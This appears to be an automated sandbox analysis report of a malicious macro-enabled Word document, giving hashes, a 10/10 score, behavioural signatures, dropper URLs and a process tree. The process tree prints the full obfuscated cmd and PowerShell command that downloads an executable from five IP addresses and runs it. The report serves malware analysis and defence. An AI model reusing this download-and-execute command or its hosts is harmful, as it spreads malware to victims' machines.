Overview

overview

10

Static

static

8

27bfe27a4f...e.docm

windows7_x64

10

27bfe27a4f...e.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    135s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    16-06-2022 03:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    27bfe27a4f0fe8da3fabaca074cb4d3982f3b117c4d402afc6ca148eceff80be.docm

  • Size

    95KB

  • MD5

    2f38493885e8008f32c048958a2cdeda

  • SHA1

    3b623b3085213362add7008af21248c134090386

  • SHA256

    27bfe27a4f0fe8da3fabaca074cb4d3982f3b117c4d402afc6ca148eceff80be

  • SHA512

    694a02475c24786524388034b2501ea571d541a58c77ebc5b3066526ea3ea2e50829fd1f0270cfc452f30dacbd051834fb1053c8c92775bb1971725fc95071d0

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://13.114.230.250/QV2skGqtTw
exe.dropper

http://13.52.104.41/Igfq6xv5xo
exe.dropper

http://13.127.212.245/3LwnZ1t8
exe.dropper

http://206.189.181.0/Xht8nvYWZg
exe.dropper

http://115.66.127.67/JS9zvxk1i

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27bfe27a4f0fe8da3fabaca074cb4d3982f3b117c4d402afc6ca148eceff80be.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1788
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\windows\system32\cmd /c set _xxx=p&& set _yyy=owersh&& set _zzz=ell&& call %_xxx%%_yyy%%_zzz% $rHOUDnJ = '$ADWf3i = new-obj0-93413080-468166100ect -com0-93413080-468166100obj0-93413080-468166100ect wsc0-93413080-468166100ript.she0-93413080-468166100ll;$Z8EiF = new-object sys0-93413080-468166100tem.net.web0-93413080-468166100client;$tkmgSjln2 = new-object random;$zJurOI4 = \"0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.114.230.250/QV2skGqtTw,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.52.104.41/Igfq6xv5xo,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.127.212.245/3LwnZ1t8,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://206.189.181.0/Xht8nvYWZg,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://115.66.127.67/JS9zvxk1i\".spl0-93413080-468166100it(\",\");$qTPCWnKa = $tkmgSjln2.nex0-93413080-468166100t(1, 65536);$pWKbd = \"c:\win0-93413080-468166100dows\tem0-93413080-468166100p\103.ex0-93413080-468166100e\";for0-93413080-468166100each($Q4omsE06 in $zJurOI4){try{$Z8EiF.dow0-93413080-468166100nlo0-93413080-468166100adf0-93413080-468166100ile($Q4omsE06.ToS0-93413080-468166100tring(), $pWKbd);sta0-93413080-468166100rt-pro0-93413080-468166100cess $pWKbd;break;}catch{}}'.replace('0-93413080-468166100', $IUZAe);$Vp4Qn = '';iex($rHOUDnJ);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1612
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $rHOUDnJ = '$ADWf3i = new-obj0-93413080-468166100ect -com0-93413080-468166100obj0-93413080-468166100ect wsc0-93413080-468166100ript.she0-93413080-468166100ll;$Z8EiF = new-object sys0-93413080-468166100tem.net.web0-93413080-468166100client;$tkmgSjln2 = new-object random;$zJurOI4 = \"0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.114.230.250/QV2skGqtTw,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.52.104.41/Igfq6xv5xo,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.127.212.245/3LwnZ1t8,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://206.189.181.0/Xht8nvYWZg,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://115.66.127.67/JS9zvxk1i\".spl0-93413080-468166100it(\",\");$qTPCWnKa = $tkmgSjln2.nex0-93413080-468166100t(1, 65536);$pWKbd = \"c:\win0-93413080-468166100dows\tem0-93413080-468166100p\103.ex0-93413080-468166100e\";for0-93413080-468166100each($Q4omsE06 in $zJurOI4){try{$Z8EiF.dow0-93413080-468166100nlo0-93413080-468166100adf0-93413080-468166100ile($Q4omsE06.ToS0-93413080-468166100tring(), $pWKbd);sta0-93413080-468166100rt-pro0-93413080-468166100cess $pWKbd;break;}catch{}}'.replace('0-93413080-468166100', $IUZAe);$Vp4Qn = '';iex($rHOUDnJ);
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:580
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1652

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/580-77-0x000000006A680000-0x000000006AC2B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/580-76-0x0000000004CF0000-0x0000000004E04000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/580-75-0x0000000004BE0000-0x0000000004CE4000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/580-74-0x000000006A680000-0x000000006AC2B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/580-70-0x0000000000000000-mapping.dmp

      Download

    • memory/1612-69-0x0000000000000000-mapping.dmp

      Download

    • memory/1652-73-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1652-72-0x0000000000000000-mapping.dmp

      Download

    • memory/1788-61-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-60-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-64-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-65-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-67-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-66-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-68-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-62-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-54-0x00000000724D1000-0x00000000724D4000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1788-63-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-59-0x0000000070F3D000-0x0000000070F48000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1788-58-0x0000000075DB1000-0x0000000075DB3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1788-57-0x0000000070F3D000-0x0000000070F48000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1788-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1788-55-0x000000006FF51000-0x000000006FF53000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1788-79-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-78-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-80-0x0000000000455000-0x0000000000459000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1788-81-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1788-82-0x0000000070F3D000-0x0000000070F48000-memory.dmp

      Filesize

      44KB

      Download